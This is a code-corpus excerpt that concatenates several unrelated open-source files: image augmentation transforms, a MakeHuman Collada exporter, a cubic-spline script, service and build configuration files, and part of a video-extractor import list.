\"\"\"\n\n def __init__(self, p=0.5):\n super().__init__()\n self.p = p\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be inverted.\n\n Returns:\n PIL Image or Tensor: Randomly color inverted image.\n \"\"\"\n if torch.rand(1).item() < self.p:\n return F.invert(img)\n return img\n\n def __repr__(self):\n return self.__class__.__name__ + '(p={})'.format(self.p)\n\n\nclass RandomPosterize(torch.nn.Module):\n \"\"\"Posterize the image randomly with a given probability by reducing the\n number of bits for each color channel. If the image is torch Tensor, it should be of type torch.uint8,\n and it is expected to have [..., 1 or 3, H, W] shape, where ... means an arbitrary number of leading dimensions.\n If img is PIL Image, it is expected to be in mode \"L\" or \"RGB\".\n\n Args:\n bits (int): number of bits to keep for each channel (0-8)\n p (float): probability of the image being color inverted. 
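        An illustrative sketch (``img`` is assumed to be an existing image; for tensor
        input it must be of dtype ``torch.uint8`` as noted above):

            >>> poster = RandomPosterize(bits=4, p=0.5)
            >>> out = poster(img)    # roughly half of the calls keep only 4 bits per channel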
Default value is 0.5\n \"\"\"\n\n def __init__(self, bits, p=0.5):\n super().__init__()\n self.bits = bits\n self.p = p\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be posterized.\n\n Returns:\n PIL Image or Tensor: Randomly posterized image.\n \"\"\"\n if torch.rand(1).item() < self.p:\n return F.posterize(img, self.bits)\n return img\n\n def __repr__(self):\n return self.__class__.__name__ + '(bits={},p={})'.format(self.bits, self.p)\n\n\nclass RandomSolarize(torch.nn.Module):\n \"\"\"Solarize the image randomly with a given probability by inverting all pixel\n values above a threshold. If img is a Tensor, it is expected to be in [..., 1 or 3, H, W] format,\n where ... means it can have an arbitrary number of leading dimensions.\n If img is PIL Image, it is expected to be in mode \"L\" or \"RGB\".\n\n Args:\n threshold (float): all pixels equal or above this value are inverted.\n p (float): probability of the image being color inverted. Default value is 0.5\n \"\"\"\n\n def __init__(self, threshold, p=0.5):\n super().__init__()\n self.threshold = threshold\n self.p = p\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be solarized.\n\n Returns:\n PIL Image or Tensor: Randomly solarized image.\n \"\"\"\n if torch.rand(1).item() < self.p:\n return F.solarize(img, self.threshold)\n return img\n\n def __repr__(self):\n return self.__class__.__name__ + '(threshold={},p={})'.format(self.threshold, self.p)\n\n\nclass RandomAdjustSharpness(torch.nn.Module):\n \"\"\"Adjust the sharpness of the image randomly with a given probability. If the image is torch Tensor,\n it is expected to have [..., 1 or 3, H, W] shape, where ... means an arbitrary number of leading dimensions.\n\n Args:\n sharpness_factor (float): How much to adjust the sharpness. Can be\n any non negative number. 0 gives a blurred image, 1 gives the\n original image while 2 increases the sharpness by a factor of 2.\n p (float): probability of the image being color inverted. Default value is 0.5\n \"\"\"\n\n def __init__(self, sharpness_factor, p=0.5):\n super().__init__()\n self.sharpness_factor = sharpness_factor\n self.p = p\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be sharpened.\n\n Returns:\n PIL Image or Tensor: Randomly sharpened image.\n \"\"\"\n if torch.rand(1).item() < self.p:\n return F.adjust_sharpness(img, self.sharpness_factor)\n return img\n\n def __repr__(self):\n return self.__class__.__name__ + '(sharpness_factor={},p={})'.format(self.sharpness_factor, self.p)\n\n\nclass RandomAutocontrast(torch.nn.Module):\n \"\"\"Autocontrast the pixels of the given image randomly with a given probability.\n If the image is torch Tensor, it is expected\n to have [..., 1 or 3, H, W] shape, where ... means an arbitrary number of leading dimensions.\n If img is PIL Image, it is expected to be in mode \"L\" or \"RGB\".\n\n Args:\n p (float): probability of the image being autocontrasted. 
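        An illustrative sketch chaining the probabilistic photometric transforms defined
        above (``img`` is assumed to be an existing PIL Image in mode 'L' or 'RGB', and
        ``Compose`` is the composition helper already used in this module's other examples):

            >>> ops = Compose([
            >>>     RandomSolarize(threshold=192.0, p=0.5),
            >>>     RandomAdjustSharpness(sharpness_factor=2, p=0.5),
            >>>     RandomAutocontrast(p=0.5),
            >>> ])
            >>> out = ops(img)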
Default value is 0.5\n \"\"\"\n\n def __init__(self, p=0.5):\n super().__init__()\n self.p = p\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be autocontrasted.\n\n Returns:\n PIL Image or Tensor: Randomly autocontrasted image.\n \"\"\"\n if torch.rand(1).item() < self.p:\n return F.autocontrast(img)\n return img\n\n def __repr__(self):\n return self.__class__.__name__ + '(p={})'.format(self.p)\n\n\nclass RandomEqualize(torch.nn.Module):\n \"\"\"Equalize the histogram of the given image randomly with a given probability.\n If the image is torch Tensor, it is expected\n to have [..., 1 or 3, H, W] shape, where ... means an arbitrary number of leading dimensions.\n If img is PIL Image, it is expected to be in mode \"P\", \"L\" or \"RGB\".\n\n Args:\n p (float): probability of the image being equalized. Default value is 0.5\n \"\"\"\n\n def __init__(self, p=0.5):\n super().__init__()\n self.p = p\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be equalized.\n\n Returns:\n PIL Image or Tensor: Randomly equalized image.\n \"\"\"\n if torch.rand(1).item() < self.p:\n return F.equalize(img)\n return img\n\n def __repr__(self):\n return self.__class__.__name__ + '(p={})'.format(self.p)\n"} {"ext": "py", "sha": "1a308f7e9bd682eb831b7022a8afafc9c2739711", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n**Project Name:** MakeHuman\n\n**Product Home Page:** http://www.makehumancommunity.org/\n\n**Github Code Home Page:** https://github.com/makehumancommunity/\n\n**Authors:** Thomas Larsson, Jonas Hauquier\n\n**Copyright(c):** MakeHuman Team 2001-2019\n\n**Licensing:** AGPL3\n\n This file is part of MakeHuman (www.makehumancommunity.org).\n\n This program is free software: you can redistribute it and/or modify\n it under the terms of the GNU Affero General Public License as\n published by the Free Software Foundation, either version 3 of the\n License, or (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU Affero General Public License for more details.\n\n You should have received a copy of the GNU Affero General Public License\n along with this program. 
If not, see .\n\n\nAbstract\n--------\n\nTODO\n\"\"\"\n\nfrom export import Exporter, ExportConfig\n\n\nclass DaeConfig(ExportConfig):\n def __init__(self):\n ExportConfig.__init__(self)\n\n self.useRelPaths = True\n self.useNormals = True\n\n self.yUpFaceZ = True\n self.yUpFaceX = False\n self.zUpFaceNegY = False\n self.zUpFaceX = False\n\n self.localY = True\n self.localX = False\n self.localG = False\n\n self.facePoseUnits = False\n self.hiddenGeom = False\n\n # TODO preferably these are used (perhaps as enum) instead of the bools above\n # TODO move these to export Config super class\n @property\n def meshOrientation(self):\n if self.yUpFaceZ:\n return 'yUpFaceZ'\n if self.yUpFaceX:\n return 'yUpFaceX'\n if self.zUpFaceNegY:\n return 'zUpFaceNegY'\n if self.zUpFaceX:\n return 'zUpFaceX'\n return 'yUpFaceZ'\n\n @property\n def localBoneAxis(self):\n if self.localY:\n return 'y'\n if self.localX:\n return 'x'\n if self.localG:\n return 'g'\n return 'y'\n\n @property\n def upAxis(self):\n if self.meshOrientation.startswith('yUp'):\n return 1\n elif self.meshOrientation.startswith('zUp'):\n return 2\n\n '''\n @property\n def offsetVect(self):\n result = [0.0, 0.0, 0.0]\n result[self.upAxis] = self.offset\n return result\n '''\n\nclass ExporterCollada(Exporter):\n def __init__(self):\n Exporter.__init__(self)\n self.name = \"Collada (dae)\"\n self.filter = \"Collada (*.dae)\"\n self.fileExtension = \"dae\"\n self.orderPriority = 95.0\n\n def build(self, options, taskview):\n import gui\n Exporter.build(self, options, taskview)\n\n self.hiddenGeom = options.addWidget(gui.CheckBox(\"Helper geometry\", False))\n self.facePoseUnits = options.addWidget(gui.CheckBox(\"Facial pose-units\", False))\n\n orients = []\n box = options.addWidget(gui.GroupBox(\"Orientation\"))\n self.yUpFaceZ = box.addWidget(gui.RadioButton(orients, \"Y up, face Z\", True))\n self.yUpFaceX = box.addWidget(gui.RadioButton(orients, \"Y up, face X\", False))\n self.zUpFaceNegY = box.addWidget(gui.RadioButton(orients, \"Z up, face -Y\", False))\n self.zUpFaceX = box.addWidget(gui.RadioButton(orients, \"Z up, face X\", False))\n\n csyses = []\n box = options.addWidget(gui.GroupBox(\"Bone orientation\"))\n self.localY = box.addWidget(gui.RadioButton(csyses, \"Along local Y\", True))\n self.localX = box.addWidget(gui.RadioButton(csyses, \"Along local X\", False))\n self.localG = box.addWidget(gui.RadioButton(csyses, \"Local = Global\", False))\n\n def export(self, human, filename):\n from .mh2collada import exportCollada\n cfg = self.getConfig()\n cfg.setHuman(human)\n exportCollada(filename(\"dae\"), cfg)\n\n def getConfig(self):\n cfg = DaeConfig()\n cfg.feetOnGround = self.feetOnGround.selected\n cfg.scale,cfg.unit = self.taskview.getScale()\n\n cfg.yUpFaceZ = self.yUpFaceZ.selected\n cfg.yUpFaceX = self.yUpFaceX.selected\n cfg.zUpFaceNegY = self.zUpFaceNegY.selected\n cfg.zUpFaceX = self.zUpFaceX.selected\n\n cfg.localY = self.localY.selected\n cfg.localX = self.localX.selected\n cfg.localG = self.localG.selected\n\n cfg.facePoseUnits = self.facePoseUnits.selected\n cfg.hiddenGeom = self.hiddenGeom.selected\n\n return cfg\n\n\ndef load(app):\n app.addExporter(ExporterCollada())\n\ndef unload(app):\n pass\n"} {"ext": "py", "sha": "1a308fc844743316e91889144701d06fd1f68333", "content": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/10/04 14:23\n# @Author : Iydon\n# @File : course3.5.py\n\nimport numpy as np\nfrom Poly import *\nimport matplotlib.pyplot as plt\n\ndef natural_cubic_spline(xs:list, fxs:list, 
display:bool=False):\n \"\"\"\n Cubic spline interpolation.\n \"\"\"\n n = len(xs)\n hs = [xs[i+1]-xs[i] for i in range(n-1)]\n A = np.diag([0]+hs[1:],1) + np.diag(hs[:-1]+[0],-1)\n A += np.diag([1]+[2*(hs[i+1]+hs[i]) for i in range(n-2)]+[1])\n bs = [0]+[3/hs[i+1]*(fxs[i+2]-fxs[i+1])-3/hs[i]*(fxs[i+1]-fxs[i]) for i in range(n-2)]+[0]\n # a, b, c, d: end with 'x'.\n cx = [i[0] for i in (np.linalg.inv(A) * np.matrix(bs).transpose()).tolist()]\n bx = [1/hs[i]*(fxs[i+1]-fxs[i])-hs[i]/3*(2*cx[i]+cx[i+1]) for i in range(n-1)]\n dx = [1/3/hs[i]*(cx[i+1]-cx[i]) for i in range(n-1)]\n # S_i(x)\n Ss = [fxs[i]+bx[i]*Poly([1,-xs[i]])+cx[i]*Poly([1,-xs[i]])**2+dx[i]*Poly([1,-xs[i]])**3 for i in range(n-1)]\n if display: print(fxs, bx, cx, dx, sep=\"\\n\\n\\n\")\n return Ss\n\ndef clamped_cubic_spline(xs:list, fxs:list, boundray:list=[0,0]):\n \"\"\"\n Cubic spline interpolation.\n \"\"\"\n n = len(xs)\n hs = [xs[i+1]-xs[i] for i in range(n-1)]\n A = np.diag(hs,1) + np.diag(hs,-1)\n A += np.diag([2*hs[0]]+[2*(hs[i+1]+hs[i]) for i in range(n-2)]+[2*hs[-1]])\n head = [3/hs[0]*(fxs[1]-fxs[0]) - 3*boundray[0]]\n tail = [3*boundray[-1] - 3/hs[-1]*(fxs[-1]-fxs[-2])]\n bs = head+[3/hs[i+1]*(fxs[i+2]-fxs[i+1])-3/hs[i]*(fxs[i+1]-fxs[i]) for i in range(n-2)]+tail\n # a, b, c, d: end with 'x'.\n cx = [i[0] for i in (np.linalg.inv(A) * np.matrix(bs).transpose()).tolist()]\n bx = [1/hs[i]*(fxs[i+1]-fxs[i])-hs[i]/3*(2*cx[i]+cx[i+1]) for i in range(n-1)]\n dx = [1/3/hs[i]*(cx[i+1]-cx[i]) for i in range(n-1)]\n # S_i(x)\n Ss = [fxs[i]+bx[i]*Poly([1,-xs[i]])+cx[i]*Poly([1,-xs[i]])**2+dx[i]*Poly([1,-xs[i]])**3 for i in range(n-1)]\n return Ss\n\ndef cubic_spline_lambdify(S:str, xs:list):\n \"\"\"\n Lambdify the cubic spline function.\n \"\"\"\n f = [\"%s[%d].lambdify()(x)*(%s<=x<%s)\"%(S, i, xs[i], xs[i+1]) for i in range(len(xs)-1)]\n return eval(\"lambda x: %s\"%\"+\".join(f))\n\nxs = [0.9,1.3,1.9,2.1,2.6,3.0,3.9,4.4,4.7,5.0,6.0,7.0,8.0,9.2,10.5,11.3,11.6,12.0,12.6,13.0,13.3]\nfxs = [1.3,1.5,1.85,2.1,2.6,2.7,2.4,2.15,2.05,2.1,2.25,2.3,2.25,1.95,1.4,0.9,0.7,0.6,0.5,0.4,0.25]\n\nS = natural_cubic_spline(xs, fxs)\n\nf = cubic_spline_lambdify(\"S\", xs)\nplt.plot(xs, fxs, marker=\"*\", color=\"orange\")\n\nx = np.linspace(0.9, 13.29, 100)\ny = [f(x) for x in x]\nplt.plot(x, y, color=\"blue\")\nplt.axis(\"equal\")\nplt.grid()\nplt.show()\n"} {"ext": "py", "sha": "1a308fd9e1ebc079500cbd82442e5e805649c7a7", "content": "# Copyright Contributors to the Amundsen project.\n# SPDX-License-Identifier: Apache-2.0\n\nfrom threading import Lock\n\nfrom flask import current_app\nfrom werkzeug.utils import import_string\n\nfrom search_service import config\nfrom search_service.proxy.base import BaseProxy\n\n_proxy_client = None\n_proxy_client_lock = Lock()\n\nDEFAULT_PAGE_SIZE = 10\n\n\ndef get_proxy_client() -> BaseProxy:\n \"\"\"\n Provides singleton proxy client based on the config\n :return: Proxy instance of any subclass of BaseProxy\n \"\"\"\n global _proxy_client\n\n if _proxy_client:\n return _proxy_client\n\n with _proxy_client_lock:\n if _proxy_client:\n return _proxy_client\n else:\n obj = current_app.config[config.PROXY_CLIENT_KEY]\n\n # Gather all the configuration to create a Proxy Client\n host = current_app.config[config.PROXY_ENDPOINT]\n user = current_app.config[config.PROXY_USER]\n password = current_app.config[config.PROXY_PASSWORD]\n client = import_string(current_app.config[config.PROXY_CLIENT])\n\n # number of results per search page\n page_size = current_app.config.get(config.SEARCH_PAGE_SIZE_KEY, 
DEFAULT_PAGE_SIZE)\n\n _proxy_client = client(host=host, user=user, password=password, client=obj, page_size=page_size)\n\n return _proxy_client\n"} {"ext": "py", "sha": "1a3090b1f1b7c8ec957944ac445ccef2d60698f9", "content": "import sys\nimport os.path as op\n\nrpws_folder = op.dirname(op.dirname(__file__))\nsys.path.append(rpws_folder)\nprint('sys.path + {}'.format(rpws_folder))\n\nfrom rpws import RevitServer\n\nimport testconfig as config\n\n\nrs = RevitServer(config.test_server_name, config.test_server_version)\n\n\nfor parent, folders, files, models in rs.walk(config.test_folder):\n print(parent)\n for fd in folders:\n print('\\t@d {}'.format(fd.path))\n for f in files:\n print('\\t@f {}'.format(f.path))\n for m in models:\n print('\\t@m {}'.format(m.path))\n"} {"ext": "py", "sha": "1a30918f59610302054f0f57c278941b01e37f05", "content": "import random\nfrom collections import namedtuple\nfrom abc import abstractmethod, ABC\nfrom typing import TypeVar\n\nfrom msdm.core.problemclasses.pomdp.pomdp import \\\n State, Action, Observation, PartiallyObservableMDP\nfrom msdm.core.problemclasses.pomdp.tabularpomdp import TabularPOMDP, Belief\nfrom msdm.core.distributions import Distribution, DictDistribution\nfrom msdm.core.algorithmclasses import Result\n\nAgentState = TypeVar('AgentState')\nStep = namedtuple(\"Step\", \"state agentstate action nextstate reward observation nextagentstate\")\n\nclass POMDPPolicy(ABC):\n @abstractmethod\n def initial_agentstate(self) -> AgentState:\n pass\n\n @abstractmethod\n def action_dist(self, ag : AgentState) -> Distribution[Action]:\n pass\n\n @abstractmethod\n def next_agentstate(self, ag : AgentState, a : Action, o : Observation) -> AgentState:\n pass\n\n def run_on(self,\n pomdp: PartiallyObservableMDP,\n initial_state=None,\n initial_agentstate=None,\n max_steps=int(2 ** 30),\n rng=random):\n if initial_state is None:\n initial_state = pomdp.initial_state_dist().sample()\n if initial_agentstate is None:\n initial_agentstate = self.initial_agentstate()\n\n traj = []\n s = initial_state\n ag = initial_agentstate\n for t in range(max_steps):\n if pomdp.is_terminal(s):\n break\n a = self.action_dist(ag).sample(rng=rng)\n ns = pomdp.next_state_dist(s, a).sample(rng=rng)\n r = pomdp.reward(s, a, ns)\n o = pomdp.observation_dist(a, ns).sample(rng=rng)\n nag = self.next_agentstate(ag, a, o)\n traj.append(Step(s, ag, a, ns, r, o, nag))\n s = ns\n ag = nag\n traj.append(Step(s, ag, None, None, None, None, None))\n if traj:\n states, agentstates, actions, _, rewards, _, _ = zip(*traj)\n else:\n states = ()\n actions = ()\n rewards = ()\n agentstates = ()\n return traj\n\nclass ValueBasedTabularPOMDPPolicy(POMDPPolicy):\n \"\"\"\n POMDP policy that selects actions based on a\n representation of action values at a belief state.\n \"\"\"\n def __init__(self, pomdp : TabularPOMDP):\n self.pomdp = pomdp\n\n @abstractmethod\n def action_value(self, b : Belief, a : Action):\n pass\n\n def initial_agentstate(self):\n return Belief(tuple(self.pomdp.state_list), tuple(self.pomdp.initial_state_vec))\n\n def action_dist(self, ag : Belief):\n av = {a: self.action_value(ag, a) for a in self.pomdp.action_list}\n maxv = max(av.values())\n return DictDistribution.uniform([a for a, v in av.items() if v == maxv])\n\n def next_agentstate(self, ag, a, o):\n s_dist = DictDistribution(zip(*ag))\n ns_dist = self.pomdp.state_estimator(s_dist, a, o)\n ss = tuple(self.pomdp.state_list)\n return Belief(ss, tuple([ns_dist.prob(ns) for ns in ss]))\n"} {"ext": "gyp", "sha": 
"1a30919ff2ff549be6e1bebd0c68b2a0f2806d5f", "content": "# Copyright (c) 2012 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n{\n 'target_defaults': {\n 'variables': {\n 'chromium_code': 1,\n },\n 'include_dirs': [\n '<(DEPTH)',\n ],\n },\n 'targets': [\n {\n 'target_name': 'cloud_print_service_lib',\n 'type': 'static_library',\n 'dependencies': [\n '<(DEPTH)/base/base.gyp:base',\n '<(DEPTH)/build/temp_gyp/googleurl.gyp:googleurl',\n '<(DEPTH)/net/net.gyp:net',\n '<(DEPTH)/printing/printing.gyp:printing',\n ],\n 'sources': [\n 'service_state.cc',\n 'service_state.h',\n 'service_switches.cc',\n 'service_switches.h',\n 'win/chrome_launcher.cc',\n 'win/chrome_launcher.h',\n 'win/local_security_policy.cc',\n 'win/local_security_policy.h',\n ],\n 'conditions': [\n ['OS==\"win\"', {\n 'dependencies': [\n '<(DEPTH)/chrome/chrome.gyp:launcher_support',\n ],\n }],\n ],\n },\n {\n 'target_name': 'cloud_print_service',\n 'type': 'executable',\n 'include_dirs': [\n # To allow including \"version.h\"\n '<(SHARED_INTERMEDIATE_DIR)',\n ],\n 'sources': [\n 'win/cloud_print_service.cc',\n 'win/cloud_print_service.h',\n 'win/cloud_print_service.rc',\n 'win/resource.h',\n ],\n 'dependencies': [\n 'cloud_print_service_lib',\n ],\n 'conditions': [\n ['OS==\"win\"', {\n 'dependencies': [\n '<(DEPTH)/chrome/chrome.gyp:chrome_version_header',\n ],\n }],\n ],\n 'msvs_settings': {\n 'VCLinkerTool': {\n 'SubSystem': '1', # Set /SUBSYSTEM:CONSOLE\n 'UACExecutionLevel': '2', # /level='requireAdministrator'\n 'AdditionalDependencies': [\n 'secur32.lib',\n ],\n },\n },\n },\n ],\n}\n"} {"ext": "py", "sha": "1a3092a0502564d366bb3176ad46091e181d39bc", "content": "#Copyright 2019 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# Lint as: python3\n\"\"\"Download, computes and stores the checksums.\"\"\"\n\nfrom absl import app\nimport tensorflow_datasets as tfds\nfrom tensorflow_graphics.datasets.modelnet40 import ModelNet40\n\n\ndef main(_):\n config = tfds.download.DownloadConfig(register_checksums=True)\n modelnet40_builder = ModelNet40(data_dir=\"~/tensorflow_datasets\")\n modelnet40_builder.download_and_prepare(download_config=config)\n\n\nif __name__ == \"__main__\":\n app.run(main)\n"} {"ext": "py", "sha": "1a3093c150ac67fc7335e315f3c99aeb54e64e4b", "content": "# flake8: noqa\nfrom __future__ import unicode_literals\n\nfrom .abc import (\n ABCIE,\n ABCIViewIE,\n)\nfrom .abcnews import (\n AbcNewsIE,\n AbcNewsVideoIE,\n)\nfrom .abcotvs import (\n ABCOTVSIE,\n ABCOTVSClipsIE,\n)\nfrom .academicearth import AcademicEarthCourseIE\nfrom .acast import (\n ACastIE,\n ACastChannelIE,\n)\nfrom .adn import ADNIE\nfrom .adobeconnect import AdobeConnectIE\nfrom .adobetv import (\n AdobeTVEmbedIE,\n AdobeTVIE,\n AdobeTVShowIE,\n AdobeTVChannelIE,\n AdobeTVVideoIE,\n)\nfrom .adultswim import AdultSwimIE\nfrom .aenetworks import (\n AENetworksIE,\n AENetworksCollectionIE,\n AENetworksShowIE,\n HistoryTopicIE,\n 
HistoryPlayerIE,\n BiographyIE,\n)\nfrom .afreecatv import AfreecaTVIE\nfrom .airmozilla import AirMozillaIE\nfrom .aljazeera import AlJazeeraIE\nfrom .alphaporno import AlphaPornoIE\nfrom .amara import AmaraIE\nfrom .alura import (\n AluraIE,\n AluraCourseIE\n)\nfrom .amcnetworks import AMCNetworksIE\nfrom .animelab import (\n AnimeLabIE,\n AnimeLabShowsIE,\n)\nfrom .americastestkitchen import (\n AmericasTestKitchenIE,\n AmericasTestKitchenSeasonIE,\n)\nfrom .animeondemand import AnimeOnDemandIE\nfrom .anvato import AnvatoIE\nfrom .aol import AolIE\nfrom .allocine import AllocineIE\nfrom .aliexpress import AliExpressLiveIE\nfrom .apa import APAIE\nfrom .aparat import AparatIE\nfrom .appleconnect import AppleConnectIE\nfrom .appletrailers import (\n AppleTrailersIE,\n AppleTrailersSectionIE,\n)\nfrom .applepodcasts import ApplePodcastsIE\nfrom .archiveorg import (\n ArchiveOrgIE,\n YoutubeWebArchiveIE,\n)\nfrom .arcpublishing import ArcPublishingIE\nfrom .arkena import ArkenaIE\nfrom .ard import (\n ARDBetaMediathekIE,\n ARDIE,\n ARDMediathekIE,\n)\nfrom .arte import (\n ArteTVIE,\n ArteTVEmbedIE,\n ArteTVPlaylistIE,\n)\nfrom .arnes import ArnesIE\nfrom .asiancrush import (\n AsianCrushIE,\n AsianCrushPlaylistIE,\n)\nfrom .atresplayer import AtresPlayerIE\nfrom .atttechchannel import ATTTechChannelIE\nfrom .atvat import ATVAtIE\nfrom .audimedia import AudiMediaIE\nfrom .audioboom import AudioBoomIE\nfrom .audiomack import AudiomackIE, AudiomackAlbumIE\nfrom .audius import (\n AudiusIE,\n AudiusTrackIE,\n AudiusPlaylistIE,\n AudiusProfileIE,\n)\nfrom .awaan import (\n AWAANIE,\n AWAANVideoIE,\n AWAANLiveIE,\n AWAANSeasonIE,\n)\nfrom .azmedien import AZMedienIE\nfrom .baidu import BaiduVideoIE\nfrom .bandaichannel import BandaiChannelIE\nfrom .bandcamp import (\n BandcampIE,\n BandcampAlbumIE,\n BandcampWeeklyIE,\n BandcampMusicIE,\n)\nfrom .bannedvideo import BannedVideoIE\nfrom .bbc import (\n BBCCoUkIE,\n BBCCoUkArticleIE,\n BBCCoUkIPlayerEpisodesIE,\n BBCCoUkIPlayerGroupIE,\n BBCCoUkPlaylistIE,\n BBCIE,\n)\nfrom .beeg import BeegIE\nfrom .behindkink import BehindKinkIE\nfrom .bellmedia import BellMediaIE\nfrom .beatport import BeatportIE\nfrom .bet import BetIE\nfrom .bfi import BFIPlayerIE\nfrom .bfmtv import (\n BFMTVIE,\n BFMTVLiveIE,\n BFMTVArticleIE,\n)\nfrom .bibeltv import BibelTVIE\nfrom .bigflix import BigflixIE\nfrom .bild import BildIE\nfrom .bilibili import (\n BiliBiliIE,\n BiliBiliSearchIE,\n BilibiliCategoryIE,\n BiliBiliBangumiIE,\n BilibiliAudioIE,\n BilibiliAudioAlbumIE,\n BiliBiliPlayerIE,\n BilibiliChannelIE,\n)\nfrom .biobiochiletv import BioBioChileTVIE\nfrom .bitchute import (\n BitChuteIE,\n BitChuteChannelIE,\n)\nfrom .bitwave import (\n BitwaveReplayIE,\n BitwaveStreamIE,\n)\nfrom .biqle import BIQLEIE\nfrom .blackboardcollaborate import BlackboardCollaborateIE\nfrom .bleacherreport import (\n BleacherReportIE,\n BleacherReportCMSIE,\n)\nfrom .bloomberg import BloombergIE\nfrom .bokecc import BokeCCIE\nfrom .bongacams import BongaCamsIE\nfrom .bostonglobe import BostonGlobeIE\nfrom .box import BoxIE\nfrom .bpb import BpbIE\nfrom .br import (\n BRIE,\n BRMediathekIE,\n)\nfrom .bravotv import BravoTVIE\nfrom .breakcom import BreakIE\nfrom .brightcove import (\n BrightcoveLegacyIE,\n BrightcoveNewIE,\n)\nfrom .businessinsider import BusinessInsiderIE\nfrom .buzzfeed import BuzzFeedIE\nfrom .byutv import BYUtvIE\nfrom .c56 import C56IE\nfrom .camdemy import (\n CamdemyIE,\n CamdemyFolderIE\n)\nfrom .cammodels import CamModelsIE\nfrom .camwithher import 
CamWithHerIE\nfrom .canalplus import CanalplusIE\nfrom .canalc2 import Canalc2IE\nfrom .canvas import (\n CanvasIE,\n CanvasEenIE,\n VrtNUIE,\n DagelijkseKostIE,\n)\nfrom .carambatv import (\n CarambaTVIE,\n CarambaTVPageIE,\n)\nfrom .cartoonnetwork import CartoonNetworkIE\nfrom .cbc import (\n CBCIE,\n CBCPlayerIE,\n CBCWatchVideoIE,\n CBCWatchIE,\n CBCOlympicsIE,\n)\nfrom .cbs import CBSIE\nfrom .cbslocal import (\n CBSLocalIE,\n CBSLocalArticleIE,\n)\nfrom .cbsinteractive import CBSInteractiveIE\nfrom .cbsnews import (\n CBSNewsEmbedIE,\n CBSNewsIE,\n CBSNewsLiveVideoIE,\n)\nfrom .cbssports import (\n CBSSportsEmbedIE,\n CBSSportsIE,\n TwentyFourSevenSportsIE,\n)\nfrom .ccc import (\n CCCIE,\n CCCPlaylistIE,\n)\nfrom .ccma import CCMAIE\nfrom .cctv import CCTVIE\nfrom .cda import CDAIE\nfrom .ceskatelevize import (\n CeskaTelevizeIE,\n CeskaTelevizePoradyIE,\n)\nfrom .channel9 import Channel9IE\nfrom .charlierose import CharlieRoseIE\nfrom .chaturbate import ChaturbateIE\nfrom .chilloutzone import ChilloutzoneIE\nfrom .chirbit import (\n ChirbitIE,\n ChirbitProfileIE,\n)\nfrom .cinchcast import CinchcastIE\nfrom .cinemax import CinemaxIE\nfrom .ciscolive import (\n CiscoLiveSessionIE,\n CiscoLiveSearchIE,\n)\nfrom .cjsw import CJSWIE\nfrom .cliphunter import CliphunterIE\nfrom .clippit import ClippitIE\nfrom .cliprs import ClipRsIE\nfrom .clipsyndicate import ClipsyndicateIE\nfrom .closertotruth import CloserToTruthIE\nfrom .cloudflarestream import CloudflareStreamIE\nfrom .cloudy import CloudyIE\nfrom .clubic import ClubicIE\nfrom .clyp import ClypIE\nfrom .cmt import CMTIE\nfrom .cnbc import (\n CNBCIE,\n CNBCVideoIE,\n)\nfrom .cnn import (\n CNNIE,\n CNNBlogsIE,\n CNNArticleIE,\n)\nfrom .coub import CoubIE\nfrom .comedycentral import (\n ComedyCentralIE,\n ComedyCentralTVIE,\n)\nfrom .commonmistakes import CommonMistakesIE, UnicodeBOMIE\nfrom .commonprotocols import (\n MmsIE,\n RtmpIE,\n ViewSourceIE,\n)\nfrom .condenast import CondeNastIE\nfrom .contv import CONtvIE\nfrom .corus import CorusIE\nfrom .cracked import CrackedIE\nfrom .crackle import CrackleIE\nfrom .crooksandliars import CrooksAndLiarsIE\nfrom .crunchyroll import (\n CrunchyrollIE,\n CrunchyrollShowPlaylistIE\n)\nfrom .cspan import CSpanIE\nfrom .ctsnews import CtsNewsIE\nfrom .ctv import CTVIE\nfrom .ctvnews import CTVNewsIE\nfrom .cultureunplugged import CultureUnpluggedIE\nfrom .curiositystream import (\n CuriosityStreamIE,\n CuriosityStreamCollectionIE,\n)\nfrom .cwtv import CWTVIE\nfrom .dailymail import DailyMailIE\nfrom .dailymotion import (\n DailymotionIE,\n DailymotionPlaylistIE,\n DailymotionUserIE,\n)\nfrom .daum import (\n DaumIE,\n DaumClipIE,\n DaumPlaylistIE,\n DaumUserIE,\n)\nfrom .dbtv import DBTVIE\nfrom .dctp import DctpTvIE\nfrom .deezer import (\n DeezerPlaylistIE,\n DeezerAlbumIE,\n)\nfrom .democracynow import DemocracynowIE\nfrom .dfb import DFBIE\nfrom .dhm import DHMIE\nfrom .digg import DiggIE\nfrom .discoveryplusindia import (\n DiscoveryPlusIndiaIE,\n DiscoveryPlusIndiaShowIE,\n)\nfrom .dotsub import DotsubIE\nfrom .douyin import DouyinIE\nfrom .douyutv import (\n DouyuShowIE,\n DouyuTVIE,\n)\nfrom .dplay import (\n DPlayIE,\n DiscoveryPlusIE,\n HGTVDeIE,\n ScienceChannelIE\n)\nfrom .dreisat import DreiSatIE\nfrom .drbonanza import DRBonanzaIE\nfrom .drtuber import DrTuberIE\nfrom .drtv import (\n DRTVIE,\n DRTVLiveIE,\n)\nfrom .dtube import DTubeIE\nfrom .dvtv import DVTVIE\nfrom .duboku import (\n DubokuIE,\n DubokuPlaylistIE\n)\nfrom .dumpert import DumpertIE\nfrom .defense import 
